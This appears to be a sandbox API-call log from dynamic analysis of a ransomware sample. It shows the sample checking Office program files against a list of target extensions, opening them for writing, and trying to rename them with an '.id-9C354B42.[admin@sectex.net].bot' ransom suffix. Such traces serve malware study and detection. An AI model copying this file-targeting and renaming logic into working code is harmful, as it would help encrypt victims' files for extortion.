	[0159.200] lstrlenW (lpString=".xlsx") returned 5
	[0159.200] lstrcmpiW (lpString1=".xlsx", lpString2="B.SAM") returned -1
	[0159.200] lstrlenW (lpString=".ppt") returned 4
	[0159.200] lstrcmpiW (lpString1=".ppt", lpString2=".SAM") returned -1
	[0159.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\PAB.SAM") returned 58
	[0159.200] lstrlenW (lpString=".zip") returned 4
	[0159.200] lstrcmpiW (lpString1=".zip", lpString2=".SAM") returned 1
	[0159.200] lstrlenW (lpString=".rar") returned 4
	[0159.200] lstrcmpiW (lpString1=".rar", lpString2=".SAM") returned -1
	[0159.200] lstrlenW (lpString=".bz2") returned 4
	[0159.200] lstrcmpiW (lpString1=".bz2", lpString2=".SAM") returned -1
	[0159.200] lstrlenW (lpString=".7z") returned 3
	[0159.200] lstrcmpiW (lpString1=".7z", lpString2="SAM") returned -1
	[0159.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\PAB.SAM") returned 58
	[0159.200] lstrlenW (lpString=".dbf") returned 4
	[0159.200] lstrcmpiW (lpString1=".dbf", lpString2=".SAM") returned -1
	[0159.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\PAB.SAM") returned 58
	[0159.200] lstrlenW (lpString=".1cd") returned 4
	[0159.200] lstrcmpiW (lpString1=".1cd", lpString2=".SAM") returned -1
	[0159.200] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\PAB.SAM") returned 58
	[0159.200] lstrlenW (lpString=".jpg") returned 4
	[0159.200] lstrcmpiW (lpString1=".jpg", lpString2=".SAM") returned -1
	[0159.201] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0159.201] lstrlenW (lpString="RM.DLL") returned 6
	[0159.201] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\RM.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\rm.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0159.434] GetFileSizeEx (in: hFile=0x3d8, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=99688) returned 1
	[0159.434] CloseHandle (hObject=0x3d8) returned 1
	[0159.434] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\RM.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\rm.dll")) returned 0x20
	[0159.473] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\RM.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\rm.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.493] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\RM.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\rm.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0159.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\RM.DLL") returned 57
	[0159.511] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\RM.DLL") returned 57
	[0159.511] lstrlenW (lpString=".doc") returned 4
	[0159.511] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.511] lstrlenW (lpString=".docx") returned 5
	[0159.512] lstrcmpiW (lpString1=".docx", lpString2="M.DLL") returned -1
	[0159.512] lstrlenW (lpString=".pdf") returned 4
	[0159.512] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.512] lstrlenW (lpString=".xls") returned 4
	[0159.512] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.512] lstrlenW (lpString=".xlsx") returned 5
	[0159.512] lstrcmpiW (lpString1=".xlsx", lpString2="M.DLL") returned -1
	[0159.512] lstrlenW (lpString=".ppt") returned 4
	[0159.512] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\RM.DLL") returned 57
	[0159.512] lstrlenW (lpString=".zip") returned 4
	[0159.512] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.512] lstrlenW (lpString=".rar") returned 4
	[0159.512] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.512] lstrlenW (lpString=".bz2") returned 4
	[0159.512] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.512] lstrlenW (lpString=".7z") returned 3
	[0159.512] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\RM.DLL") returned 57
	[0159.512] lstrlenW (lpString=".dbf") returned 4
	[0159.512] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\RM.DLL") returned 57
	[0159.512] lstrlenW (lpString=".1cd") returned 4
	[0159.512] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\RM.DLL") returned 57
	[0159.512] lstrlenW (lpString=".jpg") returned 4
	[0159.512] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\RM.DLL") returned 57
	[0159.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\RM.DLL") returned 57
	[0159.513] lstrlenW (lpString=".doc") returned 4
	[0159.513] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.513] lstrlenW (lpString=".docx") returned 5
	[0159.513] lstrcmpiW (lpString1=".docx", lpString2="M.DLL") returned -1
	[0159.513] lstrlenW (lpString=".pdf") returned 4
	[0159.513] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.513] lstrlenW (lpString=".xls") returned 4
	[0159.513] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.513] lstrlenW (lpString=".xlsx") returned 5
	[0159.513] lstrcmpiW (lpString1=".xlsx", lpString2="M.DLL") returned -1
	[0159.513] lstrlenW (lpString=".ppt") returned 4
	[0159.513] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\RM.DLL") returned 57
	[0159.513] lstrlenW (lpString=".zip") returned 4
	[0159.513] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.513] lstrlenW (lpString=".rar") returned 4
	[0159.513] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.513] lstrlenW (lpString=".bz2") returned 4
	[0159.513] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.513] lstrlenW (lpString=".7z") returned 3
	[0159.513] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\RM.DLL") returned 57
	[0159.513] lstrlenW (lpString=".dbf") returned 4
	[0159.513] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\RM.DLL") returned 57
	[0159.513] lstrlenW (lpString=".1cd") returned 4
	[0159.513] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.513] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\RM.DLL") returned 57
	[0159.513] lstrlenW (lpString=".jpg") returned 4
	[0159.513] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.514] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0159.514] lstrlenW (lpString="DWGDP.DLL") returned 9
	[0159.514] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\DWGDP.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\dwgdp.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0159.535] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=9387368) returned 1
	[0159.535] CloseHandle (hObject=0x25c) returned 1
	[0159.535] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\DWGDP.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\dwgdp.dll")) returned 0x20
	[0159.539] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\DWGDP.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\dwgdp.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.539] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\DWGDP.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\dwgdp.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\DWGDP.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\dwgdp.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0159.539] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DWGDP.DLL") returned 52
	[0159.539] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DWGDP.DLL") returned 52
	[0159.540] lstrlenW (lpString=".doc") returned 4
	[0159.540] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.540] lstrlenW (lpString=".docx") returned 5
	[0159.540] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1
	[0159.540] lstrlenW (lpString=".pdf") returned 4
	[0159.540] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.540] lstrlenW (lpString=".xls") returned 4
	[0159.540] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.540] lstrlenW (lpString=".xlsx") returned 5
	[0159.540] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1
	[0159.540] lstrlenW (lpString=".ppt") returned 4
	[0159.540] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DWGDP.DLL") returned 52
	[0159.540] lstrlenW (lpString=".zip") returned 4
	[0159.540] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.540] lstrlenW (lpString=".rar") returned 4
	[0159.540] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.540] lstrlenW (lpString=".bz2") returned 4
	[0159.540] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.540] lstrlenW (lpString=".7z") returned 3
	[0159.540] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DWGDP.DLL") returned 52
	[0159.540] lstrlenW (lpString=".dbf") returned 4
	[0159.540] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DWGDP.DLL") returned 52
	[0159.540] lstrlenW (lpString=".1cd") returned 4
	[0159.540] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.540] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DWGDP.DLL") returned 52
	[0159.540] lstrlenW (lpString=".jpg") returned 4
	[0159.540] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DWGDP.DLL") returned 52
	[0159.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DWGDP.DLL") returned 52
	[0159.541] lstrlenW (lpString=".doc") returned 4
	[0159.541] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.541] lstrlenW (lpString=".docx") returned 5
	[0159.541] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1
	[0159.541] lstrlenW (lpString=".pdf") returned 4
	[0159.541] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.541] lstrlenW (lpString=".xls") returned 4
	[0159.541] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.541] lstrlenW (lpString=".xlsx") returned 5
	[0159.541] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1
	[0159.541] lstrlenW (lpString=".ppt") returned 4
	[0159.541] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DWGDP.DLL") returned 52
	[0159.541] lstrlenW (lpString=".zip") returned 4
	[0159.541] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.541] lstrlenW (lpString=".rar") returned 4
	[0159.541] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.541] lstrlenW (lpString=".bz2") returned 4
	[0159.541] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.541] lstrlenW (lpString=".7z") returned 3
	[0159.541] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DWGDP.DLL") returned 52
	[0159.541] lstrlenW (lpString=".dbf") returned 4
	[0159.541] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.541] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DWGDP.DLL") returned 52
	[0159.541] lstrlenW (lpString=".1cd") returned 4
	[0159.542] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\DWGDP.DLL") returned 52
	[0159.542] lstrlenW (lpString=".jpg") returned 4
	[0159.542] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.542] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0159.542] lstrlenW (lpString="EDITORS.DLL") returned 11
	[0159.542] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EDITORS.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\editors.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0159.543] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=44424) returned 1
	[0159.543] CloseHandle (hObject=0x25c) returned 1
	[0159.543] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EDITORS.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\editors.dll")) returned 0x20
	[0159.543] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EDITORS.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\editors.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.543] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\EDITORS.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\editors.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0159.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EDITORS.DLL") returned 54
	[0159.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EDITORS.DLL") returned 54
	[0159.543] lstrlenW (lpString=".doc") returned 4
	[0159.543] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.543] lstrlenW (lpString=".docx") returned 5
	[0159.543] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0159.543] lstrlenW (lpString=".pdf") returned 4
	[0159.543] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.543] lstrlenW (lpString=".xls") returned 4
	[0159.543] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.543] lstrlenW (lpString=".xlsx") returned 5
	[0159.543] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0159.543] lstrlenW (lpString=".ppt") returned 4
	[0159.543] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EDITORS.DLL") returned 54
	[0159.544] lstrlenW (lpString=".zip") returned 4
	[0159.544] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.544] lstrlenW (lpString=".rar") returned 4
	[0159.544] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.544] lstrlenW (lpString=".bz2") returned 4
	[0159.544] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.544] lstrlenW (lpString=".7z") returned 3
	[0159.544] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EDITORS.DLL") returned 54
	[0159.544] lstrlenW (lpString=".dbf") returned 4
	[0159.544] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EDITORS.DLL") returned 54
	[0159.544] lstrlenW (lpString=".1cd") returned 4
	[0159.544] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EDITORS.DLL") returned 54
	[0159.544] lstrlenW (lpString=".jpg") returned 4
	[0159.544] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EDITORS.DLL") returned 54
	[0159.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EDITORS.DLL") returned 54
	[0159.544] lstrlenW (lpString=".doc") returned 4
	[0159.544] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.544] lstrlenW (lpString=".docx") returned 5
	[0159.544] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0159.544] lstrlenW (lpString=".pdf") returned 4
	[0159.544] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.544] lstrlenW (lpString=".xls") returned 4
	[0159.544] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.545] lstrlenW (lpString=".xlsx") returned 5
	[0159.545] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0159.545] lstrlenW (lpString=".ppt") returned 4
	[0159.545] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EDITORS.DLL") returned 54
	[0159.545] lstrlenW (lpString=".zip") returned 4
	[0159.545] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.545] lstrlenW (lpString=".rar") returned 4
	[0159.545] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.545] lstrlenW (lpString=".bz2") returned 4
	[0159.545] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.545] lstrlenW (lpString=".7z") returned 3
	[0159.545] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EDITORS.DLL") returned 54
	[0159.545] lstrlenW (lpString=".dbf") returned 4
	[0159.545] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EDITORS.DLL") returned 54
	[0159.545] lstrlenW (lpString=".1cd") returned 4
	[0159.545] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\EDITORS.DLL") returned 54
	[0159.545] lstrlenW (lpString=".jpg") returned 4
	[0159.545] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.545] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0159.545] lstrlenW (lpString="ELEMENTS.DLL") returned 12
	[0159.545] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ELEMENTS.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\elements.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0159.547] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=260488) returned 1
	[0159.547] CloseHandle (hObject=0x25c) returned 1
	[0159.547] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ELEMENTS.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\elements.dll")) returned 0x20
	[0159.547] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ELEMENTS.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\elements.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.547] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ELEMENTS.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\elements.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0159.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ELEMENTS.DLL") returned 55
	[0159.547] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ELEMENTS.DLL") returned 55
	[0159.547] lstrlenW (lpString=".doc") returned 4
	[0159.547] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.547] lstrlenW (lpString=".docx") returned 5
	[0159.547] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0159.547] lstrlenW (lpString=".pdf") returned 4
	[0159.547] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.547] lstrlenW (lpString=".xls") returned 4
	[0159.547] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.547] lstrlenW (lpString=".xlsx") returned 5
	[0159.547] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0159.548] lstrlenW (lpString=".ppt") returned 4
	[0159.548] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ELEMENTS.DLL") returned 55
	[0159.548] lstrlenW (lpString=".zip") returned 4
	[0159.548] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.548] lstrlenW (lpString=".rar") returned 4
	[0159.548] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.548] lstrlenW (lpString=".bz2") returned 4
	[0159.548] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.548] lstrlenW (lpString=".7z") returned 3
	[0159.548] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ELEMENTS.DLL") returned 55
	[0159.548] lstrlenW (lpString=".dbf") returned 4
	[0159.548] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ELEMENTS.DLL") returned 55
	[0159.548] lstrlenW (lpString=".1cd") returned 4
	[0159.548] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ELEMENTS.DLL") returned 55
	[0159.548] lstrlenW (lpString=".jpg") returned 4
	[0159.548] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ELEMENTS.DLL") returned 55
	[0159.548] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ELEMENTS.DLL") returned 55
	[0159.548] lstrlenW (lpString=".doc") returned 4
	[0159.548] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.549] lstrlenW (lpString=".docx") returned 5
	[0159.549] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1
	[0159.549] lstrlenW (lpString=".pdf") returned 4
	[0159.549] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0159.549] lstrlenW (lpString=".xls") returned 4
	[0159.549] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0159.549] lstrlenW (lpString=".xlsx") returned 5
	[0159.549] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1
	[0159.549] lstrlenW (lpString=".ppt") returned 4
	[0159.549] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0159.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ELEMENTS.DLL") returned 55
	[0159.549] lstrlenW (lpString=".zip") returned 4
	[0159.549] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0159.549] lstrlenW (lpString=".rar") returned 4
	[0159.549] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0159.549] lstrlenW (lpString=".bz2") returned 4
	[0159.549] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0159.549] lstrlenW (lpString=".7z") returned 3
	[0159.549] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0159.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ELEMENTS.DLL") returned 55
	[0159.549] lstrlenW (lpString=".dbf") returned 4
	[0159.549] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0159.549] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ELEMENTS.DLL") returned 55
	[0159.549] lstrlenW (lpString=".1cd") returned 4
	[0159.549] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0159.550] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ELEMENTS.DLL") returned 55
	[0159.550] lstrlenW (lpString=".jpg") returned 4
	[0159.550] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0159.550] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0159.550] lstrlenW (lpString="ELEMUTIL.DLL") returned 12
	[0159.550] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ELEMUTIL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\elemutil.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0159.550] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=145312) returned 1
	[0159.550] CloseHandle (hObject=0x25c) returned 1
	[0159.551] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ELEMUTIL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\elemutil.dll")) returned 0x20
	[0159.551] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ELEMUTIL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\elemutil.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.551] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\ELEMUTIL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\elemutil.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0159.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ELEMUTIL.DLL") returned 55
	[0159.551] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\ELEMUTIL.DLL") returned 55
	[0159.551] lstrlenW (lpString=".doc") returned 4
	[0159.551] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0159.551] lstrlenW (lpString=".docx") returned 5
	[0159.551] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
